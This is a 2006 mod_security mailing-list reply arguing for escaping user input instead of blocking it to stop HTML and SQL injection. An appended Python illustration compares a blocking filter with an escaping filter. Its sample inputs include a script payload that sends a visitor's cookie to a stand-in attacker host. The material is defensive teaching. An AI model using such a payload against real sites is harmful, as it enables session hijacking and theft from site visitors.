Re: [mod-security-users] mod_security causing Apache 1.3.33 to hang
From: Tom A. <tan...@oa...> - 2006-01-13 15:00:34
Ivan Ristic wrote:
>> I think it would be extremely useful to be able to modify request
>> content in this way rather than just flagging it.
>
> Perhaps, give me one real-life example where you would use it?

The present example of trying to prevent HTML injection in posts where user input is going to be displayed on a webpage, possibly by software that doesn't do proper sanitizing of its own.

Doing little-constrained wildcard matching like "<.+?>" is a recipe for potentially huge performance hits, plus it wholesale rejects user input that should otherwise be acceptable in an escaped format. This would be true for SQL injection filters as well, and anywhere else that strings are blocked simply for containing dubious characters when they would be known OK if those characters could be escaped.

Sanitizing functionality is like a bouncer at a club who checks IDs and stamps people's hands if they're over 21 so that they can order alcohol, and does not reject from the club entirely those under 21. Likewise, you might not want to prevent people from having discussions _about_ HTML or SQL or other topics which might just contain strings that would trigger a filter block. Allow them to post their comments, but remove the attack potential by escaping those characters which would allow the strings to do damage under the wrong circumstances.

Formats such as these might be ideal:

    SecFilterSelective ARG_BLOGPOST s/>/&gt;/
    SecFilterExternal ARG_BLOGPOST "html_escape.pl"
    SecFilterEscapeHTML ARG_BLOGPOST
    SecFilterEscapeSQL ARG_SEARCHSTRING

Doing something like the last two should not be all that difficult, as simple generic escape functions can be written and simply applied to the argument listed. Just implementing

    SecFilterEscapeHTML ARG_BLOGPOST

to replace

    SecFilterSelective ARG_BLOGPOST "<.+>"

would both prevent lots of false positives (valid HTML discussions, etc.) and measurably improve performance on moderately busy discussion forum or blog sites.

This is real security, not just a perception... replacing key symbols with their HTML escape codes can annihilate HTML injection, XSS, and scripting attacks with little overhead.

Tom
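The SecFilterEscapeHTML directive Tom proposes above is hypothetical; it was not a mod_security directive when this was written. The Python below is an added illustration of the two strategies his post contrasts (refuse any post matching "<.+>" versus escape the dangerous characters and accept the post). It is not code from the thread or from mod_security, and the sample posts, the function names and the sample attacker host are constructed for the example.

```python
import html
import re

# Constructed sample inputs (not from the original thread): a legitimate
# discussion *about* HTML, a script-injection payload, and a plain comment.
SAMPLE_POSTS = {
    "discussion": "Use <b> for bold and <i> for italics; close them with </b> and </i>.",
    "attack": "<script>new Image().src='http://evil.example/?c='+document.cookie</script>",
    "plain": "No markup here, just noting that 2 < 3.",
}

# The rule the post wants to replace: SecFilterSelective ARG_BLOGPOST "<.+>"
TAG_LIKE = re.compile(r"<.+>")


def blocking_filter(value):
    """Model of the reject-on-match rule: return (accepted, stored_value).
    Anything tag-shaped causes the whole post to be refused."""
    if TAG_LIKE.search(value):
        return False, None
    return True, value


# Escape table for HTML text content. '&' is included so an attacker cannot
# smuggle a pre-encoded entity through unchanged, and both quote characters
# so the same output is also safe inside a quoted attribute value.
_HTML_ESCAPES = str.maketrans({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
})


def html_escape(value):
    """Escape the characters that let text change HTML structure."""
    return value.translate(_HTML_ESCAPES)


def escaping_filter(value):
    """Model of the proposed (hypothetical) SecFilterEscapeHTML: accept every
    post and neutralise it instead of rejecting it."""
    return True, html_escape(value)


def is_inert_markup(stored):
    """A stored value is inert if a browser can find no tag start or attribute
    delimiter in it; every such character now lives inside an entity."""
    return stored is not None and not any(ch in stored for ch in "<>\"'")


def compare(posts):
    """Run both strategies over every sample and summarise: whether the
    blocker accepted the post, whether the escaped form is inert, and whether
    the original text is still recoverable for display (html.unescape is the
    inverse of html_escape, so nothing the poster wrote is lost)."""
    summary = {}
    for name, text in posts.items():
        blocker_accepts, _ = blocking_filter(text)
        _, escaped = escaping_filter(text)
        summary[name] = {
            "blocker_accepts": blocker_accepts,
            "escaped": escaped,
            "escaped_is_inert": is_inert_markup(escaped),
            "round_trips": html.unescape(escaped) == text,
        }
    return summary


if __name__ == "__main__":
    for name, result in compare(SAMPLE_POSTS).items():
        print(f"{name:11s} blocker_accepts={result['blocker_accepts']!s:5s} "
              f"inert={result['escaped_is_inert']} round_trips={result['round_trips']}")
        print(f"{'':11s} stored: {result['escaped']}")
```

Running it shows the point of the post: the blocking rule refuses the harmless discussion about <b> and <i> just as firmly as it refuses the script payload, while the escaping filter accepts both and stores each as text that renders literally. Two caveats a practitioner would add: entity escaping is the right transform only for HTML text and attribute contexts (a value dropped into a script block or a URL needs a different encoding), and the SQL analogue is not character substitution at the proxy but bind parameters in the application.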